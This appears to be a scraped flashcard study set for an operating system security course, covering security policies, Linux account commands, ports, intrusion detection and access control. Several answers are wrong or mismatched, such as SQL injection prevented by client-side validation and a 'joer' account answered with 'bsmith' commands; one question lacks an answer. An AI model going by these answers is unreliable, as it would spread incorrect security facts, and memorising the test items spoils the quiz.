CIS1358 Operating System Security
User management policy
A policy that identifies actions to follow when employee status changes to ensure the security of the system, including hiring new employees, promoting and transferring employees, and terminating employees.
Privacy policy
A policy that outlines how the organization will secure private information for its employees, clients, and customers.
Change Management and Configuration Policy
A policy that regulates changes to policies, practices, and equipment that could impact the security of your IT structure.
Authorized Access Policy (AAP)
A policy that specifies access controls that are employed on a network
Human Resources (HR) Policy
A policy used by HR that defines hiring and termination processes, job rotation requirements, and personal time off procedures.
What is mutual authentication?
A process by which each party in an online communication verifies the identity of the other party
Guideline
A recommendation that is used when a specific standard or procedure doesn't exist.
Regulation
A requirement published by a government or other licensing body that must be followed
Which actions can a typical passive intrusion detection system (IDS) take when it detects an attack? (Select two.)
An alert is generated and delivered via email, the console, or an SNMP trap. The IDS logs all pertinent data about the intrusion.
Which command should you use to display both listening and non-listening sockets on your Linux system? (Tip: Enter the commands as if at the command prompt.)
netstat -a
You need to increase the security of your Linux system by finding and closing open ports. Which of the following commands should you use to locate open ports?
nmap
Which command should you use to scan for open TCP ports on your Linux system? (Tip: Enter the command as if at the command prompt.)
nmap -sT
Which form of access control enforces security based on user identities and allows individual users to define access controls over owned resources?
DAC
You have a system that allows the owner of a file to identify users and their permissions to the file. Which type of access control model is implemented?
DAC
What is the purpose of audit trails?
Detect security-violating events.
Audit trails produced by auditing activities are which type of security control?
Detective
Which of the following are advantages of virtualization? (Select two.)
Easy migration of systems to different hardware. Centralized administration.
You are concerned about attacks directed against the firewall on you r network. You would like to examine the content of individual frames sent to the firewall
Packet sniffer
You want to know which protocols are being used on your network. You'd like to monitor network traffic and sort traffic by protocol.Which tool should you use?
Packet sniffer
The auditing feature of an operating system servers as what form of control when users are informed that their actions are being monitored?
Preventative
You suspect that the gshant user account is locked.Enter the command you use at the command prompt to show the status of the user accoun
passwd -S gshant
A user with the account name larry has just been terminated from the company. There is good reason to believe that user will attempt to access and damage files in the system in the very near future. which of the following commands will disable or remove the user account from the system and remove his home directory?
userdel -r larry
You have performed an audit and have found an active account for an employee with the username joer. This user no longer works for the company. Which command can you use to disable this account?
userdel bsmith;rm -rf /home/bsmith userdel -r bsmith
Which of the following utilities could you use to lock a user account? (Select two. Each answer represents an independent solution.)
usermod passwd
One of your users, Karen Scott, has recently married and is now Karen Jones. She has requested that her username be changed from kscott to kjones, but no other values change. Which of the following commands will accomplish this?
usermod -l kjones kscott
You have performed an audit and found an active account for an employee with the username joer. This user no longer works for the company. Which command can you use to disable the account?
usermod L joer
You want to make sure no unneeded software packages are running on your Linux server.Select the command from the drop-down list that you can use to see all installed RPM packages.
yum list installed
Password policy
A policy that details the requirements used in an organization
In the /etc/shadow file, which character in the password field indicates that a standard user account is locked?
!
you want to close all ports associated with NetBIOS on your network firewalls to prevent attacks directed against NetBIOS. Which ports should you close?
135, 137-139
7.1
...
7.10
...
7.11
...
7.12
...
7.13
...
7.2
...
7.3
...
7.4
...
7.5
...
7.6
...
7.7
...
7.8
...
7.9
...
8.2
...
8.3
...
8.4
...
8.5
...
8.6
...
8.7
...
8.8
...
8.9
...
To transfer files to your company's internal network from home, you use FTP. The administrator has recently implemented a firewall at the network perimeter and disabled as many ports as possible.Now you can no longer make FTP connection. You suspect the firewall is causing the issue. Which ports need to remain open so you can still transfer the files? (Select two.)
20 21
What actions can a typical passive Intrusion Detection System Take when it detects an attacks? (select two)
1. An alert is generated and delivered via e-mail, the console, or SNMP trap.2. The IDS logs all pertinent data about the intrusion.
Which of the following activities are considered passive in regards to the functioning of an intrusion detections system?(Choose two)
1. Monitoring the audit trails on a server 2. Listening to network traffic
An active IDS system often performs which of the following actions? (Select two)
1. Perform reverse lookups to identify an intruder2. Update filters to block suspect traffic
Which of the following ports does FTP use to establish sessions and manage traffic?
20, 21
Which ports does LDAP use by default? (Select two.)
389 636
To increase security on your company's internal network, the administrator has disabled as many ports as possible. Now, however, though you can browse the internet, you are unable to perform secure credit card transactions.Which port needs to be enabled to allow secure transactions?
443
You want to deploy SSL to protect authentication traffic with your LDAP-based directory service. What port would this use?
636
You want to increase the security of your network by allowing only authenticated users to be able to access network devices through a switch. Which of the following should you implement?
802.1x
Gramm-Leach-Bliley Act of 1999
A US federal law designed to protect private information held at financial institutions.
Sarbanes-Oxley Act of 2002
A US federal law that requires publicly traded companies to adhere to very stringent reporting requirements and implement strong controls on electric financial reporting systems.
HIPPA of 1996
A US federal law that specifies that all organizations must protect the health information that they maintain.
Which of the following best describes Active Directory?
A centralized database that contains user account and security information
Which of the following are disadvantages to server virtualization?
A compromised host system might affect multiple servers.
Code Escrow Agreement
A document that specifies the storage and conditions of a release of a source code.
Which of the following are disadvantages of server virtualization?
A failure in one hardware component could affect multiple servers.
What is a cookie?
A file saved on your hard drive that tracks Web site preferences and use.
Users in the sales department perform many of their daily tasks, such as emailing and creating sales presentations, on personal tablets.The chief information officer worries that one of these users might also use their tablet to steal sensitive information on the organization's network. Your job is to implement a solution that can insiders from accessing sensitive information on personal devices.Which of the following should you implement?
A guest wireless network that is isolated from your organization's production network.
Organizational Security Policy
A high-level overview of the corporate security program.
Smart devices are attractive targets for cyber criminals because they typically have minimal security and are not protected with anti-malware software. This makes it easier to exploit these types of devices and perpetrate attacks. Many smart devices can be utilized to conduct a single coordinated attack.What is the types of attack usually called?
A highly distributed attack
Which of the following describes a configuration baseline?
A list of common security settings that a group or all devices share.
Users in the sales department perform many of their daily tasks, such as emailing and creating sales presentations, on company-owned tablets. These tablets contain sensitive information. If one of these tablets is lost or stolen, this information could end up in the wrong hands.The chief information officer wants you to implement a solution that can be used to keep sensitive information from getting into the wrong hands if a device is lost or stolen.Which of the following should you implement?
A mobile device management infrastructure.
Service Level Agreement (SLA)
A negotiated agreement between the customer and the provider that guarantees the quality of a network service poviders care to a subscriber. The SLA may specify the levels of availability, serviceability, performance, operation, or other commitment requirements.
Which of the following is the strongest form of multi-factor authentication?
A password, a biometric scan, and a token device
Acceptable use policy (AUP)
A policy that defines how users should use the information and network resources in an organization.
Code of Ethics
A set of rules or standards that help individuals to act ethically in various situations.
Baseline
A standard that dictates the settings and security mechanisms that must be imposed on a system in order to comply with required security standards.
Procedure
A step-by-step process that outlines how to implement a specific action
In a variation of the brute force attack, an attacker may use a predefined list (dictionary) of common user names and passwords to gain access to existing user accounts. Which countermeasure best addresses this issue?
A strong password policy
Which of the following statements about virtual networks is true? (Select two.)
A virtual network is dependent on the configuration and physical hardware of the host operating system. Multiple virtual networks can be associated with a single physical network adapter.
Which of the following switch attacks associates the attacker's MAC address with the IP address of the victim's devices?
ARP spoofing/poisoning
Which of the following terms describes the component that is generated following authentication and is used to gain access to resources following login?
Access token
Tom Plask's user account has been locked because he entered too many incorrect passwords. You need to unlock the account. Click the tab in the properties of the Tom Plask user object you would use to unlock his account
Account
What is the most important aspect of a biometric device?
Accuracy
A security administrator is conducting a penetration test on a network. She connects a notebook system running Linux to the wireless network and then uses NMAP to probe various network hosts to see which operating system they are running. Which process did the administrator use in the penetration test in this scenario?
Active fingerprinting
You have a shared folder named Reports. Members of the Managers group have been given write access to the shared folder.Mark Mangum is a member of the Managers group. He needs access to the files in the Reports folder, but should not have any access to the Confidential.xls file.What should you do?
Add Mark Mangum to the ACL for the Confidential.xls file with Deny permissions.
You have been receiving a lot of phishing emails sent from the domain kenyan.msn.pl. Links within these emails open new browser windows at youneedit.com.pl You want to make sure that these emails never reach your inbox, but you want to make sure that emails from other sends are not affected.What should you do?
Add kenyan.msn.pl to the email blacklist.
Which of the following strategies can protect against a rainbow table password attack?
Add random bits to the password before hashing takes place.
You manage several Windows systems. Desktop users access an in-house application that is hosted on your intranet web server. When a user clicks a specific option in the application, they receive an error message that the pop-op was blocked. You need to configure the security settings so that users can see the pop-up without compromising overall security. What should you do?
Add the URL of the website to the Local intranet zone.
You manage several Windows systems. All computers are members of a domain.You use an internal website that uses Integrated Windows Authentication. You attempt to connect to the website and are prompted for authentication. You verify that your user account has permission to access the website. You need to ensure that you are automatically authenticated when you connect to the website. What should you do?
Add the internal website to the Local intranet zone.
Your organization provides its sales force with Windows 8.1 tablets to use while visiting customer sites. You manage these devices by enrolling them in a cloud-based Windows Intune account.One of your sales representatives left his notebook at a customer's site. The device contains sensitive information, and you want to change the password to prevent the data from being compromised.Which Intune portal should you use to remotely change the password?
Admin portal
Your organization provides its sales force with Windows RT 8.1 tablets to use while visiting customer sites. You manage these devices by enrolling then in your cloud-based Windows Intune account.One of your sales representatives left her tablet at an airport. The device contains sensitive information, and you need to remove it in case the device is compromised.Which Intune portal should you use to perform a remote wipe?
Admin portal
What does the netstat -a command show?
All listening and non-listening sockets
You want to allow e-commerce websites that you visit to keep track of your browsing history for shopping carts and other information, but want to prevent that information from being tracked by sites linked to the sites you explicit visit. How should you configure the browser settings?
Allow first party cookies, but block third-party cookies.
Many popular operating systems allow quick and easy file and printer sharing with other network members. Which of the following is not a means by which file and printer sharing is hardened?
Allowing NetBIOS traffic outside of your secured network.
Match each mobile device application control term on the right with the appropriate description on the left. Each description may be used once, more than once, or not at all. Jailbreaking Sideloading Snadboxing Assigned Access
Allows apps to be installed from sources other than the App Store Allows apps to be installed from sources other than the Windows Store Prevents a running app from accessing data stored by other running apps Defines a whitelist of Windows Store applications
Match the exploit on the right with the appropriate description on the left. Watering hole attack Arbitrary code execution exploit LSO exploit Zero-day attack
An attacker compromises a Web site, hoping that a target individual will access the site and be exposed to the exploit. A vulnerability in a running process allows an attacker to inject malicious instructions and run them. A flash cookie is used to collect information about the user's browsing habits without their permission. An attacker exploits computer application vulnerabilities before they are known and patched by the application's developer.
You are concerned about protection your network from network-based attacks from the Internet. Specifically, you are concerned about attacks that have not yet been identified or that do not have prescribed protections. Which type of device should you use?
Anomaly based IDS
What is the most common form of host based IDS that employs signature or pattern matching detection methods?
Anti-virus software
Which of the following statements about the use of anti-virus software is correct?
Anti-virus software should be configured to download updated virus definitions files as soon as they become available.
You have just purchased a new network device and are getting ready to connect it to your network. Which of the following actions should you take to increase its security? (Select two.)
Apply all patches and updates. Change default account passwords.
Which of the following is the best recommendation for applying hotfixes to our servers?
Apply only the hotfixes that affect to software running on your systems
What is another name for a logic bomb?
Asynchronous attack.
Which access control model is based on assigning attributes to objects and using Boolean logic to grant access based on the attributes of the subject
Attribute-based Access Control (ABAC)
Which of the following is a collection of recorded data that may include details about logons, object access, and other activities deemed important by your security policy that is often used to detect unwanted and unauthorized user activity?
Audit trail
A recreation of historical events is made possible through?
Audit trails
Which of the following terms identifies the process of reviewing log files for suspicious activity and threshold complicance?
Auditing
A remote access user needs to gain access to resources on the server. Which of the processes are performed by the remote access server to control access to resources?
Authentication and authorization
While developing a network application, a programmer adds functionally that allows her ta access the running program without authentication so she can capture debugging data. The programmer forgets to remove this functionality prior to finalizing the code and shipping the application. What type of security weakness does this represent?
Backdoor
Network-based intrusion detection is most suited to detect and prevent which types of attacks?
Bandwidth-based denial of service
KWalletManager is a Linux-based credential management system that stores encrypted account credentials for network resources.Which encryption methods can KWalletManager use to secure account credentials? (Select two.)
Blowfish CPG
A programmer that fails to check the length of imput before processing leaves his code vulnerable to what form of commong attack?
Buffer overflow
Having poor software development practices and failing to program input validation checks during development of custom software can result in a system vulnerable to which type of attack?
Buffer overflow
Which of attack is the act of exploiting a software program's free acceptance of input in order to execute arbitrary code on a target?
Buffer overflow
What is a typical goal of MAC spoofing?
Bypassing 802.1x port-based security
Click on the object in the TESTOUTDEMO.com Active Directory domain that is used to manage individual desktop workstations access.
CORPWS7
You've just deployed a new Cisco router that connects several network segments in your organization.The router is physically located in a server room that requires an ID for access. You've backed up the router configuration to a remote location in an encrypted file. You access the router configuration interface from your notebook computer using a Telnet client with a user name of admin and a password of admin. You have used the MD5 hashing algorithm to protect the password.What should you do to increase the security of this device? (Select two.)
Change the default administrative user name and password. Use an SSH client to access the router configuration.
You've just deployed a new Cisco router so you can connect a new segment to your organization's network. The router is physically located in a server room that can only be accessed with an ID card. You've backed up the the router configuration to a remote location in an encrypted file. You access the router configuration from your notebook computer by connecting it to the console port an the router. The web-based management interface uses the default user name of cusadmin and a password of highspeed. What should you do to increase the security of this device?
Change the user name and create a more complex password.
Which of the following are performed by the Microsoft Baseline Security Analyzer (MBSA) tool? (Select three.)
Check for missing patches Check for open ports Check user accounts for weak passwords
To help prevent browser attacks, users of public computers should do which of the following?
Clear the browser cache
you want to prevent your browser from running JavaScript commands that are potentially harmful. Which of the following would you restrict to accomplish this?
Client side scripts
You decide to use syslog to send log entries from multiple servers to a central logging server. Which of the following are the most important considerations for your implementations? (Select two.)
Clock synchronization between all devices Disk space on the syslog server
During the application development cycle, a developer asks several of his peers to assess the portion of the application he was assigned to write for security vulnerabilities. Which assessment technique was used in this scenario?
Code review
Which of the following is a password that relates to things that people know, such as a mother's maiden name or the name of a pet?
Cognitive
Which of the following applications typically use 802.1x authentication? (Select two)
Controlling access through a wireless access point Controlling access through a switch
Match the Group Policy type on the left with the function that it can perform on the right. (Each item can be used more than once.) Software that should be installed on a specific computer. Scripts that should run at startup or shutdown. Network communication security settings. Software that should be installed for a specific user. Scripts that should run at logon or logoff.
Computer Configuration Computer Configuration Computer Configuration User Configuration User Configuration
During the application development cycle, an application tester creates multiple virtual machines on a hypervisor, each with a different version and edition of Windows installed. She then installs the latest build of the application being developed on each virtual machine and evaluates each installation for security vulnerabilities. Which assessment technique was used in this scenario?
Configuration testing
Which of the following is a text file provided by a website to a client that is stored on a user's hard drive in order to track and record information about the user?
Cookie
Use of which of the following is a possible violation of privacy?
Cookies
ou have a small network of devices connected using a switch. You want to capture the traffic that is sent from Host A to Host B.On Host C, you install a packet sniffer that captures network traffic. After running the packet sniffer, you cannot find any captured packets between Host A and Host B.What should you do?
Configure port mirroring
You are the network administrator for a city library. Throughout the library are several groups of computers that provide public access to the Internet. Supervision of these computers has been difficult. You've had problems with patrons brining personal laptops into the library and disconnecting the network cables from the library computers to connect their laptops to the Internet. The library computers are in groups of four. Each group of four computers is connected to a hub that is connected to the library network through an access point on a switch. You want to restrict access to the network so only the library computers are permitted connectivity to the internet. What can you do?
Configure port security on the switch
To tightly control the anti-malware settings on your computer, you elect to update the signature file manually. Even though you vigilantly update the signature file, the machine becomes infected with a new type of malware.Which of the following actions would best prevent this scenario from occurring again?
Configure the software to automatically download the definition files updates as soon as they become available.
Drag the software-defined networking (SDN) layer on the left to the appropriate function on the right. (Each SDN layer may be used once, more than once, or not at all.) This layer receives it requests from the application layer. This layer is also known as the infrastructure layer. This layer communicates with the control layer through what's called the northbound interface. This layer provides the physical layer with configuration and instructions. On this layer, individual networking devices use southbound APIs to communicate with the control plane.
Control layer Physical layer Application layer Control layer Physical layer
You want to store your computer-generated audit logs in case they are needed in the future for examination or to be used as evidence in the event of a security incident. Which method can you use to ensure that the logs you put in storage have not been altered when you go to use them in the future?
Create a hash of each log.
You notice that over the last few months more and more static systems, such as the office environment control system, the security system, and lighting controls, are connecting to your network. You know that these devices can be a security threat. Which of the following measures can you take to minimize the damage these devices can cause if they are compromised?
Create a VLAN to use as a low-trust network zone for these static systems to connect to.
You are responsible for maintaining Windows workstation operating systems in your organization. Recently, an update from Microsoft was automatically installed on your workstations that caused an in-house application to stop working.To keep this from happening again, you decide to test all updates on a virtual machine before allowing them to be installed on production workstations.Currently, none of your testing virtual machines have a network connection. However, they need to be able to connect to the update servers at Microsoft to download and install updates.
Create a new virtual switch configured for bridged (external) networking Connect the virtual network interfaces in the virtual machine to the virtual switch
You are an application developer. You use a hypervisor with multiple virtual machines installed to test your applications on various operating system versions and editions. Currently, all of your testing virtual machines are connected to the production network through the hypervisor's network interface. However, you are concerned that the latest application you are working on could adversely impact other network hosts if errors exist in the code. To prevent this, you decide to isolate the virtual machines from the production network. However, they still need to be able to communicate directly with each other. What should you do?
Create a new virtual switch configured for host-only (internal) networking.Connect the virtual network interfaces in the virtual machines to the virtual switch.
You have multiple user who are computer administrators. You want each administrator to be able to shut down system and install drivers.What should you do? (Select two.)
Create a security group for the administrators and add all user accounts to the group. Grant the group the necessary user rights.
You want to give all managers the ability to view and edit a certain file. To do so, you need to edit the discretionary access control list (DACL) associated with the file. You want to be able to easily add and remove managers as their job positions change.What is the best way to accomplish this?
Create a security group for the managers. Add all user as members of the group. Add the group to the file's DACL
A manager has told you she is concerned about her employees writing their passwords for websites, network files, and database resources on sticky notes. Your office runs exclusively in a Windows environment.Which tool could you use to prevent this behavior?
Credential Manager
A security administrator logs on to a Windows server on her organization's network. She then runs a vulnerability scan on that server.What type of scan was conducted in this scenario?
Credentialed scan
Which protocol should you disable on the user access ports of a switch?
DTP
When you dispose of a computer or sell used hardware and it is crucial that none of the data on the hard disks can be recovered. Which of the following actions can you take to ensure that no data is recoverable?
Damage the hard disks so badly that all the data remanence is gone.
You've been assigned to evaluate NoSQL databases as a part of a big data analysis initiative in your organization. You've downloaded an open source NoSQL database from the internet and installed it on a test system in an isolated lab environment. Which of the following are likely to be true about this test system? (Select two.)
Data is stored in the database in an unencrypted format. The database admin user has no password assigned.
Which of the following defines an object as an entity in the context of access control?
Data, applications, systems, networks and physical space
Which of the following are subject to SQL injection attacks?
Database servers
Active Directory is a hierarchical database. Hierarchical directory databases have several advantages over flat file database structures. Which of the following is not an advantage of Active Directory's hierarchical database structure?
Decentralization
You are using a vulnerability scanner that conforms to the OVAL specifications. Which of the following items contains a specific vulnerability or security issue that could be present on a system?
Definition
When securing a newly deployed server, which of the following rules of thumb should be followed?
Determine unneeded services and their dependencies before altering the system.
Which of the following best describes the concept of virtual LAN?
Device on the same network logically grouped as if they were on separate networks
Why do attackers prefer to conduct distributed network attacks in static environments? (Select two.)
Devices tend to employ much weaker security than traditional network devices.Devices are, typically, more difficult to monitor than traditional network devices.
You've been given an assignment to evaluate NoSQL databases as a part of a big data analysis initiative in your organization. You've downloaded an open source NoSQL database from the internet and installed it on a test system in an isolated lab environment. What should you do to harden this database before implementing it in a production environment? (Select two.)
Disable anonymous access. Implement an application-layer protocol to encrypt data prior to saving it in the database.
What should yo to do a user account if the user goes on an extended vacation?
Disable the account
Which of the following actions should you take to reduce the attack surface of a server?
Disable unused services
IF maintaining confidentiality is of the utmost importance to your organization, what is the best response when an intruder is detected on your network?
Disconnect the intruder
Drag the Active Directory component on the left to the appropriate description on the right. A server that holds a copy of the Active Directory database that can be written to. A folder that subdivides and organizes network resources within a domain. An administratively-defined collection of network resources that share a common directory database and security policies. A computing element that identifies resources in the Active Directory database
Domain Controller Organizational Unit Domain Objects
When you browse to a website, a pop-up windows tells you that your computer has been infected with a virus. You click on the window to see what the problem is. Later, you find out that the window has installed spyware on your system.What type of attack has occurred?
Drive-by download
What is the most common means of virus distribution?
Your organization recently purchased 18 iPad tablets for use by the organization's management team. These devices have iOS pre-installed on them.To increase the security of these devices, you want to apply a default set of security-related configuration settings.What is the best approach to take to accomplish this? (Selecte two. EAch option is a part of a complete solution.)
Enroll the devices in a mobile device management system. Configure and apply security policy settings in a mobile device management system.
Your organization recently purchased 30 tablet devices for your traveling sales force. These devices have Windows RT preinstalled on them.To increase the security of these devices, you want to apply a default set of security-related configuration settings.What is the best approach to take to accomplish this? (Select two. Each option is part of a complete solution.)
Enroll the devices in a mobile device management system. Configure and apply security policy settings in a mobile device management system.
You have configured a NIDS to monitor network traffic. Which of the following describes an attack that is NOT detected by the NIDS device?
False Negative
You have configured an NIDS to monitor network traffic. Which of the following describes harmless traffic that has been identified as a potential attack by the NIDS device?
False positive
Which of the following is not an advantage when using an internal auditor to examine security systems and relevant documentation?
Findings in the audit and subsequent summations are viewed objectively
Which of the following identifies an operating system or network service based upon it response to ICMP messages?
Fingerprinting
You have heard about a Trojan horse program where the compromised system sends personal information to a remote attacker on a specific TCP port. You want to be able to easily tell whether any of your system are sending data to the attacker.Which log would you monitor?
Firewall
You suspect that some of your computers have been hijacked and are being used to perform denial of service attacks directed against other computers on the Internet.Which log would you check to see if this is happening?
Firewall
You are implementing a new application control solution. Prior to enforcing your application whitelist, you want to monitor user traffic for a period of time to discover user behaviors and log violations for later review. How should you configure the application control software to handle applications not contained in the whitelist?
Flag
Which of the following enters random data to the inputs of an application?
Fuzzing
As a security precaution, you have implemented IPsec that is used between any two devices on your network. IPsec provides encryption for traffic between devices.You would like to implement a solution that can scan the contents of the encrypted traffic to prevent any malicious attacks.Which solution should you implement?
Host-based IDS
Which of the following terms describes a Windows operating system patch that corrects a specific problems and is released on a short-term, periodic basis (typically monthly)?
Hotfix
Recently, a serious security breach occurred in your organization. An attacker was able to log in to the internal network and steal data through a VPN connection using the credentials assigned to a vice president in your organization.For security reasons, all individuals in upper management in your organization have unlisted home phone numbers and addresses. However, security camera footage from the vice present's home recorded someone rummaging through her garbage cans prior to the attack. The vice president admitted to writing her VPN login credentials on a sticky note that she subsequently threw away in her household trash. You suspect the attacker found the sticky note in the trash and used the credentials to log in to the network.You've reviewed the vice president's social media pages. You found pictures of her home posted, but you didn't notice anything in the photos that would give away her home address. She assured you that her smart phone was never misplaced prior to the attack.Which security weakness is the most likely cause of the security breach?
Geo-tagging was enabled on her smart phone.
Patriot Act of 2001
Gives law enforcement the ability to request information from organizations to detect and suppress terrorism.
For users who are members of the sales team, you want to force computer to use a specific desktop background and remove access to administrative tools from the Start menu.Which solution should you use?
Group Policy
Which of the following solutions would you use to control the actions that users can perform on a computer, such as shutting down the system, logging on through the network, or loading and unloading device drivers?
Group Policy
You have contracted with a vendor to supply a custom application that runs on Windows workstations. As new application versions and patches are released, you want to be able to automatically apply them to multiple computers.Which tool is your best choice for accomplishing this task?
Group Policy
Which of the Following government acts protects medical records and personal health information?
HIPAA
By definition, what is the process of reducing security exposure and tightening security controls?
Hardening
Marcus White has just been promoted to a manager. To give him access to the files that he needs, you make his user account a member of the Managers group, which has access to a special shared folder.Later that afternoon, Marcus tells you that he is still unable to access the files reserved for the Managers group. What should you do?
Have Marcus log off and log back in
Which of the following are characteristics of a rootkit? (Select two.)
Hides itself from detection. Requires administrator-level privileges for installation.
You want to create a collection of computers on your network that appear to have valuable data, but are really computers configured with fake data that could entice a potential intruder. Once the intruder connects, you want to be able to observe and gather information about the methods of attack that are being deployed. What should you implement?
Honeynet
What do host based intrusion detection system often rely upon to perform their detection activities?
Host system auditing capabilities
what does a host-based intrusion detection systems often rely upon to perform detection activities?
Host system auditing capabilities
You have installed anti-malware software that checks for viruses in email attachments. You configure the software to quarantine any files with problems. You receive an email w/ an important attachment, but the attachment is not there. Instead, you see a message that the file has been quarantined by the anti-malware software. What has happened to the file?
I has been moved to a secure folder on your computer.
What security mechanism can be used to detect attacks originating on the internet or from within an internal trusted subnet?
IDS
Which of the following devices can monitor a network and detect potential security attacks?
IDS
Which of the following devices is capable of detecting and responding to security threats?
IPS
You are concerned about attacks directed at your network firewall. You want to be able to identify and be notified of any attacks. Ina addition, you want the system to take immediate action to stop or prevent the attack, If possible.Which tool should you use?
IPS
Which of the following are security devices that perform stateful inspection of packet data and look for patterns that indicate malicious code? (Select two.)
IPS IDS
Match each bring your own device (byod) security issues o the right with a possible remedy on the left.Each remedy may be used once, more than once, or not at all. Preventing malware infections Supporting mobile device users Preventing loss of control of sensitive data Preventing malicious insider attacks Applyingthe latest anti-malware definitions
Implement a network access control (NAC) solution. Specify who users can call for help with mobile device apps in your acceptable use policy. Enroll devices in a mobile device management system. Specify where and when mobile devices can be possessed in your acceptable use policy. Implement a network access control (NAC) solution.
Your organization's security policy specifies that peer-to-peer file sharing is not allowed. Recently, you received an anonymous tip that an employee has been using a BitTorrent client to download copyrighted media while at work. You research BitTorrent and find that it uses TCP ports 6881—6889 by default. When you check your perimeter firewall configuration, only ports 80 and 443 are open. When you check your firewall logs, you find that no network traffic using ports 6881—6889 has been blocked. What should you do?
Implement an application control solution
Your organization uses a web server to host an e-commerce site.Because this web server handles financial transactions, you are concerned that it could become a prime target for exploits. You want to implement a network security control that will analyze the contents of each packet going to or from the web server. The security control must be able to identify malicious payloads and block them.What should you do?
Implement an application-aware IPS in front of the web server
An attacker inserts SQL database commands into a data input field of an order form used by a Web-based application. Wen submitted, theses commands are executed on the remote database server, causing customer contact information from the database to be sent to the malicious user's Web browser.which practice would have prevented this exploit?
Implementing client-side validation
While using a Web-based order form, an attacker enters an unusually large value in the Quantity field.The value she entered is so large that it exceeds the maximum value supported by the variable type used to store the quantity in the Web application. This causes the value of the quantity variable to wrap around to the minimum possible value, which is a negative number.As a result, the Web application processses the order as a return instead of a purchase, and the attacker's account is credited with a large sum of money.Which practices would have prevented this exploit? (Select two.)
Implementing client-side validation. Implementing server-side validation.
You have decided to perform a double blind penetration test. Which of the following actions would you perform first?
Inform senior management
Which of the following is specifically meant to ensure that a program operates on clean, correct, and useful data?
Input validation
You manage information systems for a large co-location data center.Networked environmental controls are used to manage the temperature within the data center. These controls use embedded smart technology that allows them to be managed over and internet connection using a mobile device app.You are concerned about the security of these devices. What can you do to increase their security posture? (Select two.)
Install the latest firmware updates from the device manufacturer. Verify that your network's existing security infrastructure is working properly.
You manage the information systems for a large manufacturing firm.Supervisory control and data acquisition (SCADA) devices are used on the manufacturing floor to manage your organization's automated factory equipment. The SCADA devices use embedded smart technology, allowing them to be managed using a mobile device-app over an internet connection.You are concerned about the security of these devices. What can you do to increase their security posture? (Select two.)
Install the latest firmware updates from the device manufacturer. Verify that your network's existing security infrastructure is working properly.
While using a Web-based order form, an attacker enters an unusually large value in the Quantity field.The value she entered is so large that it exceeds the maximum value supported by the variable type used to store the quantity in the Web application. This causes the value of the quantity variable to wrap around to the minimum possible value, which is a negative number.As a result, the Web application processes the order as a return instead of a purchase, and the attacker's account is refunded a large sum of money.What type of attack has occurred in the scenario?
Integer overflow
You notice a growing number of devices, such as environmental control systems and wearable devices, are connecting to your network. These devices, known as smart devices, are sending and receiving data via wireless network connections.Which of the following labels applies to this growing ecosystem of smart devices?
Internet of things
Which of the following best describes spyware?
It monitors the actions you take on your machine and sends the info back to its originating source.
You want to check a server for user accounts that have weak passwords, Which tool should you use?
John the Ripper
Which of the following is an example of a single sign-on authentication solution?
Kerberos
Which of the following protocols uses port 88?
Kerberos
Which of the following are examples of single sign-on authentication solutions? (Select two.)
Kerberos SESAME
Which of the following authentication mechanisms is designed to protect a nine-character password from attacks by hashing the first seven characters into a single hash and then hashing the remaining two characters into another separate hash?
LANMAN
While using a Web-based game created using Adobe Flash, a Flash cookie is set on a user's computer. The game saves legitimate data in the Flash cookie, such as statistics and user preferences.However, the game creator also programmed the game to track the Web sites that that user visits while the game is running and save them in the Flash cookie. This data is transferred to a server over an Internet connection without the user's permission.What type of exploit has occurred in this scenario?
Locally shared object (LSO) exploit
Which of the following are included in an operations penetration test? (Select two.)
Looking through discarded paper or media for sensitive information Eavesdropping or obtaining sensitive information from items that are not properly stored.
Which of the following attacks, if successful, causes a switch to function like a hub?
MAC flooding
You have two folders that contain documents used by various departments :-The Development group has been given the Write permission to the Design folder .-The Sales group has been given the Write permission to the Products folder. No other permissions have been given to either group. User Mark Tillman needs to have the Read permission to the Design folder and the Write permission to the Products folder. You want to use groups as much as possible.What should you do?
Make Mark a member of the Sales group; add Mark's user account directly to the ACL for the Design folder.
Which access control model is based on multilevel security where objects are assigned a security classification and subjects are granted a security clearance which allows them to access objects at or below that security classification?
Mandatory Access Control (MAC)
Which form of access control enforces security based on user identities and allows individual users to define access controls over owned resources?
Mandatory access control (MAC)
Tom Plask was recently transferred to the Technical Support department. He now needs access to the network resources used by Support employees. To grant him access, you need to add Tom Plask's user account to the Support group in the Active Directory domain. Click the tab in the properties of the Tom Plask user object you would use to accomplish this.
Member of
You have placed an FTP server in your DMZ behind your firewall. The FTP server will be used to distribute software updates and demonstration version of your products. Users report that they are unable to access the FTP server.What should yo do to enable access?
Open ports 20 and 21 for inbound and outbound connections.
You decide to use a packet sniffer to identify the type of traffic sent to a router. You run the packet sniffing software on a device that is connected to a hub with three other computers. The hub is connected to the same switch that is connected to the router.When you run the software, you see frames addressed to the four workstations, but not to the router.Which feature should you configure?
Mirroring
Which of the following activities are considered passive in regards to the function of an intrusion detection system?
Monitoring the audit trails on a server. Listening to network traffic.
You've just deployed a new Cisco router that connects several network segments in your organization. The router is physically located in a cubicle near your office. You've backed up the router configuration to a remote location in an encrypted file. You access the router configuration interface from your notebook computer using an SSH client with the user name admin01 and the password P@ssW0rd. You have used the MD5 hashing algorithm to protect the password.What should you do to increase the security of this device?
Move the router to a secure server room.
Match the virtualization feature on the right with the appropriate description on the left. Flexibility Testing Server consolidation Sandboxing
Moving virtual machines between hypervisor hosts Verifying that security controls are working as designed Performing a physical-to-virtual migration (P2V) Isolating a virtual machine from the physical network.
Which of the following best describes one-factor authentication?
Multiple authentication credentials may be required, but they are all of the same type
You have a file server named Srv3 that holds files used by the Development department. You want to allow user to access the files over the network and control access to files accessed through the network or a local logon.Which solution should you implement?
NTFS and share permissions
Which of the following is not included in a system level audit event? (Select two.)
Names of accessed files Any actions performed by the user.
Your network devices are categorized into the following zone types: • No-trust zone • Low-trust zone • Medium-trust zone • High-trust zone Your network architecture employs multiple VLANs for each of these network zones. Each zone is separated by a firewall that ensures only specific traffic IS allowed. Which of the following is the secure architecture concept that is being used on this network?
Network Segmentation
You want to identify all devices on a network along with a list of open ports on those devices. You want the results displayed in a graphical diagram. Which tool should you use?
Network mapper
You are the network administrator of a small nonprofit organization. Currently, an employee named Craig Jenkins handles all help desk calls for the organization. In recent months, the volume of help desk calls has exceeded what Craig can manage alone, so an additional help desk employee has been hired to carry some of the load. Currently, permissions to network resources are assigned directly to Craig's user object. Because the new employee needs exactly the same level of access, you decide to simply copy Craig's Active Directory domain user object and rename it with the new employee's name. Will this strategy work?
No. Permissions are not copied when a user account is copied.
